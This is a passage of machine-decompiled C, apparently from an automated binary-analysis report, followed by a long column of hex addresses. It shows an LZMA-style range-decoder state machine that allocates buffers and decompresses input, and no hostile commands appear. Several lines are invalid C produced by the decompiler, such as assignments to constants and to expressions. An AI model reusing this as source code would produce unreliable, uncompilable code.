							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                          0x00406bc0
                                          0x00406bc7
                                          0x00406bcd
                                          0x00406bd3
                                          0x00000000
                                          0x00406bd7
                                          0x00406be3
                                          0x00406be3
                                          0x00406be3
                                          0x00406bec
                                          0x00000000
                                          0x00000000
                                          0x00406bf2
                                          0x00000000
                                          0x00406bf9
                                          0x00406bfd
                                          0x00000000
                                          0x00000000
                                          0x00406c06
                                          0x00406c09
                                          0x00406c0c
                                          0x00406c0e
                                          0x00406c10
                                          0x00000000
                                          0x00000000
                                          0x00406c16
                                          0x00406c19
                                          0x00406c1b
                                          0x00406c1c
                                          0x00406c1f
                                          0x00406c21
                                          0x00406c22
                                          0x00406c24
                                          0x00406c27
                                          0x00406c2c
                                          0x00406c31
                                          0x00406c3a
                                          0x00406c4d
                                          0x00406c50
                                          0x00406c59
                                          0x00406c5c
                                          0x00406c84
                                          0x00406c84
                                          0x00406c86
                                          0x00406c94
                                          0x00406c94
                                          0x00406c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406c88
                                          0x00406c88
                                          0x00406c8b
                                          0x00406c8b
                                          0x00406c8c
                                          0x00406c8c
                                          0x00000000
                                          0x00406c88
                                          0x00406c5e
                                          0x00406c62
                                          0x00406c67
                                          0x00406c67
                                          0x00406c70
                                          0x00406c76
                                          0x00406c78
                                          0x00406c7b
                                          0x00000000
                                          0x00406c81
                                          0x00406c81
                                          0x00000000
                                          0x00406c81
                                          0x00000000
                                          0x00406c9e
                                          0x00406c9e
                                          0x00406ca2
                                          0x0040754e
                                          0x00000000
                                          0x0040754e
                                          0x00406cab
                                          0x00406cbb
                                          0x00406cbe
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc4
                                          0x00406cc4
                                          0x00406cc8
                                          0x00000000
                                          0x00000000
                                          0x00406cca
                                          0x00406ccd
                                          0x00406cd0
                                          0x00406cfa
                                          0x00406d00
                                          0x00406d07
                                          0x00000000
                                          0x00406d07
                                          0x00406cd2
                                          0x00406cd6
                                          0x00406cd9
                                          0x00406cde
                                          0x00406cde
                                          0x00406ce9
                                          0x00406cef
                                          0x00406cf1
                                          0x00406cf4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d39
                                          0x00406d3f
                                          0x00406d42
                                          0x00406d4f
                                          0x00406d57
                                          0x00000000
                                          0x00000000
                                          0x00406d0e
                                          0x00406d0e
                                          0x00406d12
                                          0x0040755d
                                          0x00000000
                                          0x0040755d
                                          0x00406d1e
                                          0x00406d29
                                          0x00406d29
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d32
                                          0x00406d35
                                          0x00406d37
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004073ce
                                          0x004073ce
                                          0x004073d4
                                          0x004073da
                                          0x004073dd
                                          0x004073e0
                                          0x004073fa
                                          0x004073fd
                                          0x00407403
                                          0x0040740e
                                          0x0040740e
                                          0x00407410
                                          0x004073e2
                                          0x004073e2
                                          0x004073f1
                                          0x004073f5
                                          0x004073f5
                                          0x00407413
                                          0x0040741a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040741c
                                          0x0040741c
                                          0x00407420
                                          0x004075cf
                                          0x00000000
                                          0x004075cf
                                          0x0040742c
                                          0x00407433
                                          0x0040743b
                                          0x0040743b
                                          0x0040743b
                                          0x0040743e
                                          0x00407441
                                          0x00407441
                                          0x00000000
                                          0x00000000
                                          0x00406d5f
                                          0x00406d61
                                          0x00406d64
                                          0x00406dd5
                                          0x00406dd8
                                          0x00406ddb
                                          0x00406de2
                                          0x00406dec
                                          0x00000000
                                          0x00406dec
                                          0x00406d66
                                          0x00406d6a
                                          0x00406d6d
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d75
                                          0x00406d77
                                          0x00406d7a
                                          0x00406d7c
                                          0x00406d81
                                          0x00406d84
                                          0x00406d87
                                          0x00406d8b
                                          0x00406d92
                                          0x00406d95
                                          0x00406d9c
                                          0x00406da0
                                          0x00406da8
                                          0x00406da8
                                          0x00406da8
                                          0x00406da2
                                          0x00406da2
                                          0x00406da2
                                          0x00406d97
                                          0x00406d97
                                          0x00406d97
                                          0x00406dac
                                          0x00406daf
                                          0x00406dcd
                                          0x00406dcf
                                          0x00000000
                                          0x00406dcf
                                          0x00406db1
                                          0x00406db4
                                          0x00406db7
                                          0x00406dba
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbf
                                          0x00406dc2
                                          0x00406dc4
                                          0x00406dc5
                                          0x00406dc8
                                          0x00000000
                                          0x00000000
                                          0x00406ffe
                                          0x00407002
                                          0x00407020
                                          0x00407023
                                          0x0040702a
                                          0x0040702d
                                          0x00407030
                                          0x00407033
                                          0x00407036
                                          0x00407039
                                          0x0040703b
                                          0x00407042
                                          0x00407043
                                          0x00407045
                                          0x00407048
                                          0x0040704b
                                          0x0040704e
                                          0x0040704e
                                          0x00407053
                                          0x00000000
                                          0x00407053
                                          0x00407004
                                          0x00407007
                                          0x0040700a
                                          0x00407014
                                          0x00000000
                                          0x00000000
                                          0x00407068
                                          0x0040706c
                                          0x0040708f
                                          0x00407092
                                          0x00407095
                                          0x0040709f
                                          0x0040706e
                                          0x0040706e
                                          0x00407071
                                          0x00407074
                                          0x00407077
                                          0x00407084
                                          0x00407087
                                          0x00407087
                                          0x00000000
                                          0x00000000
                                          0x004070ab
                                          0x004070af
                                          0x00000000
                                          0x00000000
                                          0x004070b5
                                          0x004070b9
                                          0x00000000
                                          0x00000000
                                          0x004070bf
                                          0x004070c1
                                          0x004070c5
                                          0x004070c5
                                          0x004070c8
                                          0x004070cc
                                          0x00000000
                                          0x00000000
                                          0x0040711c
                                          0x00407120
                                          0x00407127
                                          0x0040712a
                                          0x0040712d
                                          0x00407137
                                          0x00000000
                                          0x00407137
                                          0x00407122
                                          0x00000000
                                          0x00000000
                                          0x00407143
                                          0x00407147
                                          0x0040714e
                                          0x00407151
                                          0x00407154
                                          0x00407149
                                          0x00407149
                                          0x00407149
                                          0x00407157
                                          0x0040715a
                                          0x0040715d
                                          0x0040715d
                                          0x00407160
                                          0x00407163
                                          0x00407166
                                          0x00407166
                                          0x00407169
                                          0x00407170
                                          0x00407175
                                          0x00000000
                                          0x00000000
                                          0x00407203
                                          0x00407203
                                          0x00407207
                                          0x004075a5
                                          0x00000000
                                          0x004075a5
                                          0x0040720d
                                          0x00407210
                                          0x00407213
                                          0x00407217
                                          0x0040721a
                                          0x00407220
                                          0x00407222
                                          0x00407222
                                          0x00407222
                                          0x00407225
                                          0x00407228
                                          0x00000000
                                          0x00000000
                                          0x00406df8
                                          0x00406df8
                                          0x00406dfc
                                          0x00407569
                                          0x00000000
                                          0x00407569
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0c
                                          0x00406e0f
                                          0x00406e15
                                          0x00406e17
                                          0x00406e17
                                          0x00406e17
                                          0x00406e1a
                                          0x00406e1d
                                          0x00406e1d
                                          0x00406e20
                                          0x00406e23
                                          0x00000000
                                          0x00000000
                                          0x00406e29
                                          0x00406e2f
                                          0x00000000
                                          0x00000000
                                          0x00406e35
                                          0x00406e35
                                          0x00406e39
                                          0x00406e3c
